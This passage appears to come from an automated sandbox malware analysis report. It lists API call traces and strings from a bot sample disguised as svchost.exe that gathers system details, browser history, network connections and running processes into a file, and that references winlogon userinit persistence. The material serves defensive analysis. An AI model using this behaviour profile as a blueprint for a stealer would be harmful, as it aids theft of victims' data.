2644710 64->65 66 2645868-264586c 64->66 75 2645903-264590c 65->75 66->65 67 264586e-26458a8 SetFilePointer LockFile WriteFile UnlockFile 66->67 67->65 75->2 76 264590e-264591b GetHandleInformation 75->76 76->2 77 264591d-2645921 76->77 77->2 78 2645923-2645924 CloseHandle 77->78 78->2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,?,0269D3A4,75775CE0), ref: 02644C37
                                                                                                                                                                                                                • Part of subcall function 026659D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 026659EE
                                                                                                                                                                                                                • Part of subcall function 026659D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02645DE8,?,?,02645DE8,?,00000001), ref: 02665A0B
                                                                                                                                                                                                                • Part of subcall function 026659D0: SetNamedSecurityInfoA.ADVAPI32(?,02645DE8,00000010,00000000,00000000,00000000,00000001), ref: 02665A26
                                                                                                                                                                                                                • Part of subcall function 026659D0: LocalFree.KERNEL32(?,?,?,02645DE8,?,00000001), ref: 02665A37
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,00000001), ref: 02644C5E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 02644C6F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{BotVer: ,00000009,02643F9D,00000000), ref: 02644C7F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000009,00000000), ref: 02644C90
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644CA4
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000005,00000000), ref: 02644CB1
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,4.1.2,00000005,00000000,00000000), ref: 02644CC1
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000005,00000000), ref: 02644CD2
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644CE6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02644CF3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 02644D03
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000002,00000000), ref: 02644D14
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02644D28
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644D3C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000A,00000000), ref: 02644D49
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Process: ,0000000A,00000000,00000000), ref: 02644D59
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,0000000A,00000000), ref: 02644D6A
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644D9C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02644DAB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02644DBF
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02644DD2
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644DE6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02644DF3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 02644E03
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02644E14
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 02644E25
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644E39
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02644E46
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Username: ,0000000B,00000000,00000000), ref: 02644E56
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 02644E67
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644E92
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02644EA1
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02644EB5
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02644EC8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644EDC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02644EE9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 02644EF9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02644F0A
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(PROCESSOR_IDENTIFIER,?,00000104), ref: 02644F21
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644F35
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02644F42
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Processor: ,0000000C,00000000,00000000), ref: 02644F52
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 02644F63
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644F8E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02644F9D
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02644FB1
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02644FC4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02644FD8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02644FE5
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 02644FF5
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02645006
                                                                                                                                                                                                              • GetSystemDefaultLangID.KERNEL32 ref: 0264500C
                                                                                                                                                                                                              • memset.MSVCRT ref: 02645026
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645093
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 026450A0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Language: ,0000000B,00000000,00000000), ref: 026450B0
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000B,00000000), ref: 026450C1
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026450EC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 026450FB
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 0264510F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02645122
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645136
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02645143
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 02645153
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02645164
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 0264516E
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000), ref: 02645175
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000001), ref: 0264517E
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000000), ref: 02645187
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 0264519F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026451B6
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 026451C3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Screen: ,00000009,00000000,00000000), ref: 026451D3
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 026451E4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0264520F
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0264521E
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02645232
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02645245
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645259
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02645266
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 02645276
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02645287
                                                                                                                                                                                                              • GetDateFormatA.KERNELBASE(00000409,00000000,00000000,dd:MMM:yyyy,?,00000104), ref: 026452A7
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026452BB
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 026452C8
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Date: ,00000007,00000000,00000000), ref: 026452D8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000007,00000000), ref: 026452E9
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645314
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02645323
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02645337
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0264534A
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0264535E
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 0264536B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 0264537B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 0264538C
                                                                                                                                                                                                              • GetTimeFormatA.KERNELBASE(00000409,00000000,00000000,HH:mm:ss,?,00000104), ref: 026453AC
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026453C0
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 026453CD
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Local time: ,0000000D,00000000,00000000), ref: 026453DD
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,0000000D,00000000), ref: 026453EE
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0264541C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0264542B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 0264543F
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02645452
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645466
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02645473
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 02645483
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02645494
                                                                                                                                                                                                              • GetTimeZoneInformation.KERNELBASE(?), ref: 026454A1
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02645502
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645519
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02645526
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{GMT: ,00000006,00000000,00000000), ref: 02645536
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000006,00000000), ref: 02645547
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645572
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02645581
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02645595
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 026455A8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026455BC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 026455C9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 026455D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 026455EA
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026455FE
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 0264560B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Uptime: ,00000009,00000000,00000000), ref: 0264561B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000009,00000000), ref: 0264562C
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 0264566C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0264567B
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0264568C
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0264569F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026456B3
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 026456C0
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 026456D0
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 026456E1
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 026456F3
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645707
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02645714
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Windows directory: ,00000014,00000000,00000000), ref: 02645724
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000014,00000000), ref: 02645735
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645760
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0264576F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 02645783
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02645796
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026457AA
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 026457B7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 026457C7
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 026457D8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026457EC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 026457F9
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,{Administrator: ,00000010,00000000,00000000), ref: 02645809
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 0264581A
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02645820
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02645843
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02645875
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02645884
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02645895
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 026458A8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026458BC
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 026458C8
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,02685B88,00000002,00000000,00000000), ref: 026458D8
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 026458E6
                                                                                                                                                                                                                • Part of subcall function 02644900: RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\Internet Explorer\TypedURLs,00000000,00020119,?), ref: 02644925
                                                                                                                                                                                                                • Part of subcall function 02644900: _snprintf.MSVCRT ref: 0264494D
                                                                                                                                                                                                                • Part of subcall function 02644900: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,00000000,76F93490), ref: 02644987
                                                                                                                                                                                                                • Part of subcall function 02644900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026449A9
                                                                                                                                                                                                                • Part of subcall function 02644900: LockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 026449B5
                                                                                                                                                                                                                • Part of subcall function 02644900: WriteFile.KERNEL32(00000000,IE history:,0000000C,026458F1,00000000), ref: 026449C9
                                                                                                                                                                                                                • Part of subcall function 02644900: UnlockFile.KERNEL32(00000000,00000000,00000000,0000000C,00000000), ref: 026449D7
                                                                                                                                                                                                                • Part of subcall function 02644900: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 026449EB
                                                                                                                                                                                                                • Part of subcall function 02644900: LockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 026449F7
                                                                                                                                                                                                                • Part of subcall function 02644900: WriteFile.KERNEL32(00000000,02685C1C,00000001,00000000,00000000), ref: 02644A0B
                                                                                                                                                                                                                • Part of subcall function 02644900: UnlockFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02644A19
                                                                                                                                                                                                                • Part of subcall function 02644180: GetProcessHeap.KERNEL32(00000008,00000C10,00000000,00000000,76F93490), ref: 0264419D
                                                                                                                                                                                                                • Part of subcall function 02644180: HeapAlloc.KERNEL32(00000000), ref: 026441A0
                                                                                                                                                                                                                • Part of subcall function 02644180: memset.MSVCRT ref: 026441B4
                                                                                                                                                                                                                • Part of subcall function 02644180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 02644224
                                                                                                                                                                                                                • Part of subcall function 02644180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02644232
                                                                                                                                                                                                                • Part of subcall function 02644180: HeapValidate.KERNEL32(00000000), ref: 02644235
                                                                                                                                                                                                                • Part of subcall function 02644180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02644242
                                                                                                                                                                                                                • Part of subcall function 02644180: HeapFree.KERNEL32(00000000), ref: 02644245
                                                                                                                                                                                                                • Part of subcall function 02644180: GetProcessHeap.KERNEL32(00000008,00000BED), ref: 0264425D
                                                                                                                                                                                                                • Part of subcall function 02644180: HeapAlloc.KERNEL32(00000000), ref: 02644260
                                                                                                                                                                                                                • Part of subcall function 02644180: memset.MSVCRT ref: 02644270
                                                                                                                                                                                                                • Part of subcall function 02644180: GetTcpTable.IPHLPAPI(00000000,00000C00,00000001), ref: 0264428A
                                                                                                                                                                                                                • Part of subcall function 02644180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02644297
                                                                                                                                                                                                                • Part of subcall function 02644180: HeapValidate.KERNEL32(00000000), ref: 0264429A
                                                                                                                                                                                                                • Part of subcall function 02644180: GetProcessHeap.KERNEL32(00000000,00000000), ref: 026442AB
                                                                                                                                                                                                                • Part of subcall function 02644180: HeapFree.KERNEL32(00000000), ref: 026442AE
                                                                                                                                                                                                                • Part of subcall function 026444D0: memset.MSVCRT ref: 02644503
                                                                                                                                                                                                                • Part of subcall function 026444D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000000,76F93490), ref: 0264450E
                                                                                                                                                                                                                • Part of subcall function 026444D0: Process32First.KERNEL32 ref: 02644531
                                                                                                                                                                                                                • Part of subcall function 026444D0: GetHandleInformation.KERNEL32(00000000,?), ref: 0264454D
                                                                                                                                                                                                                • Part of subcall function 026444D0: CloseHandle.KERNEL32(00000000), ref: 02644567
                                                                                                                                                                                                                • Part of subcall function 02644710: NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,00000000,00000000,00000000,00000000,76F93490,?,?,?,?,02645903,00000000), ref: 0264475A
                                                                                                                                                                                                                • Part of subcall function 02644710: GetProcessHeap.KERNEL32(00000008,00000014,?,?,?,?,02645903,00000000,00000000,00000000), ref: 026447A5
                                                                                                                                                                                                                • Part of subcall function 02644710: HeapAlloc.KERNEL32(00000000,?,?,?,?,02645903,00000000,00000000,00000000), ref: 026447AC
                                                                                                                                                                                                                • Part of subcall function 02644710: memset.MSVCRT ref: 026447BF
                                                                                                                                                                                                                • Part of subcall function 02644710: _snprintf.MSVCRT ref: 0264480A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02645913
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02645924
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.2613697268.0000000002640000.00000040.00001000.00020000.00000000.sdmp, Offset: 02640000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.0000000002699000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.2613697268.000000000269E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_2640000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$LockPointerUnlockWrite$Heap$Process$memset$HandleInformationSecuritySystem_snprintf$AllocDescriptorFreeUser$AdminCloseCreateFormatMetricsNameQueryTableTimeValidate$CapsConvertDateDefaultDeviceDirectoryDisplayEnvironmentFirstInfoLangLocalModuleNamedOpenProcess32SaclSnapshotStringToolhelp32ValueVariableWindowsZone
                                                                                                                                                                                                              • String ID: %c%d:%02d$%dx%d@%d$4.1.2$HH:mm:ss$PROCESSOR_IDENTIFIER$XXX$dd:MMM:yyyy$false$true${Administrator: ${BotVer: ${Date: ${GMT: ${Language: ${Local time: ${Process: ${Processor: ${Screen: ${Uptime: ${Username: ${Windows directory:
                                                                                                                                                                                                              • API String ID: 2738427392-2715564829
                                                                                                                                                                                                              • Opcode ID: 9895eaa45b8b7f00849d20d5bd1d301877404808780de20bf76f426b2e04f47e
                                                                                                                                                                                                              • Instruction ID: 779b21d1476679dab82ab83009c85654a479dab4680003290d91e5d4579b5311
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9895eaa45b8b7f00849d20d5bd1d301877404808780de20bf76f426b2e04f47e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6DA20F70A81318BEFB209B94CC8AFEE7778EF45B04F514545F601BA1C0DBF46A858B69
                                                                                                                                                                                                              Function 02656CA0 Relevance: 298.5, APIs: 135, Strings: 35, Instructions: 960threadmemorysynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02643300: IsUserAnAdmin.SHELL32 ref: 02643325
                                                                                                                                                                                                                • Part of subcall function 02643300: GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02643344
                                                                                                                                                                                                                • Part of subcall function 02643300: PathAddBackslashA.SHLWAPI(?), ref: 02643351
                                                                                                                                                                                                                • Part of subcall function 02643300: GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 0264336E
                                                                                                                                                                                                                • Part of subcall function 02643300: _snprintf.MSVCRT ref: 02643389
                                                                                                                                                                                                                • Part of subcall function 02643300: RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 026433A7
                                                                                                                                                                                                                • Part of subcall function 02643300: RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 026433FC
                                                                                                                                                                                                                • Part of subcall function 02643300: RegCloseKey.ADVAPI32(00000000), ref: 0264340A
                                                                                                                                                                                                                • Part of subcall function 02665A50: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 02665A7F
                                                                                                                                                                                                                • Part of subcall function 02665A50: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00FFAAFF,00000000,00000000,00000000,00000000), ref: 02665AB8
                                                                                                                                                                                                                • Part of subcall function 02665A50: _snprintf.MSVCRT ref: 02665B23
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\user\AppData\Roaming\), ref: 02656CC0
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(C:\Users\user\AppData\Roaming\), ref: 02656CCB
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02656CDF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\chrome.exe), ref: 02656CFB
                                                                                                                                                                                                              • GetCommandLineA.KERNEL32 ref: 02656D05
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 02656D3D
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(0268FB68), ref: 02656D65
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02656D86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02656DA4
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02656DC5
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02656DDF
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02656DE9
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02653530,00000000,00000000,00000000), ref: 02656E38
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02656E4C
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02656E5D
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02657DD0,00000000,00000000,00000000), ref: 02656E8C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02656EA0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02656EB1
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02658080,00000000,00000000,00000000), ref: 02656EC6
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,75775A6Fa), ref: 02656ED6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02656EF6
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 02656F17
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(75775A6Fa,00000006,00000010,00000000,00000000,00000000,00000000), ref: 02656F34
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 02656F3E
                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(0268FB80), ref: 02656F49
